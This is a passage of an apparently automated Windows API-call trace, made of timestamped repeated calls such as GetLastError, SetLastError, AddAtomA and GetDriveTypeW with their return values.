(dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError 
(dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.104] SetLastError (dwErrCode=0x0) [0096.104] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.105] SetLastError (dwErrCode=0x0) [0096.105] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError 
(dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.106] SetLastError (dwErrCode=0x0) [0096.106] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.107] GetLastError () returned 0x0 [0096.107] SetLastError (dwErrCode=0x0) [0096.108] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0096.108] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.109] GetLastError () returned 0x0 [0096.109] SetLastError (dwErrCode=0x0) [0096.110] AddAtomA (lpString=0x0) returned 0x0 [0096.110] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) 
returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.111] AddAtomA (lpString=0x0) returned 0x0 [0096.111] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.112] AddAtomA (lpString=0x0) returned 0x0 [0096.112] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.113] AddAtomA (lpString=0x0) returned 0x0 [0096.113] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) 
returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.114] AddAtomA (lpString=0x0) returned 0x0 [0096.114] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.115] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.115] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.116] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.116] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) 
returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.117] AddAtomA (lpString=0x0) returned 0x0 [0096.117] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.118] AddAtomA (lpString=0x0) returned 0x0 [0096.118] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.119] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.119] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) 
returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.120] AddAtomA (lpString=0x0) returned 0x0 [0096.120] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.121] AddAtomA (lpString=0x0) returned 0x0 [0096.121] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW 